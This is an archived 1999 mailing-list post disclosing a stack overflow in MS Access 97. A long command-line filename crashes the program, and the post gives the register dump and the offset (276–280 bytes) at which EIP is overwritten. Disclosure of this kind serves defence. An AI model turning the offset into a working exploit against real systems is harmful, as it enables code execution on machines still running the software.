MS Access commanline stack overflow

Subject: MS Access commanline stack overflow
From: C. R. Messina (crmessinaSPIDERLINK.NET)
Date: Mon Dec 20 1999 - 10:55:38 CST

• Next message: darkplan: "Netscape Navigator/Communicator 4.5 buffer overflow"
• Previous message: Russ: "Alert: Global Threat Monitoring effort"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Hello guys:

I just found out that you can overflow the stack on Access 97
by passing it a large filename on the command line.

The following is a example under windows 98:
(also proven to work under Windows NT Workstation SP-4)

drive:\pathtoaccess\msaccess.exe [280+ 'overflow character']

output:

MSACCESS caused an invalid page fault in
module <unknown> at 0141:41414141.

Registers:

EAX=00000290 CS=0167 EIP=41414141 EFLGS=00000206
EBX=00000000 SS=016f ESP=0062fc94 EBP=41414141
ECX=d709b060 DS=016f ESI=bff552f6 FS=4667
EDX=00000000 ES=016f EDI=80000000 GS=0000

Bytes at CS:EIP:

Stack dump:

706d622e 00000000 0062fd94 00520065
00000064 00000000 0062fd94 30002852
00000000 81a740cb 0062fd94 00520065
302c34f0 bff772f8 0062fca8 30002827

In this very case exactly the last 4 charaters
(from offest 276 to 280) overwrite eip with 0x41414141.

I have no time at the moment for further investigation on the matter
so if any of you foresee any interesting situation here feel free to
check it out at will.

<Hex>

• Next message: darkplan: "Netscape Navigator/Communicator 4.5 buffer overflow"
• Previous message: Russ: "Alert: Global Threat Monitoring effort"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b27 : Fri Dec 24 1999 - 10:59:05 CST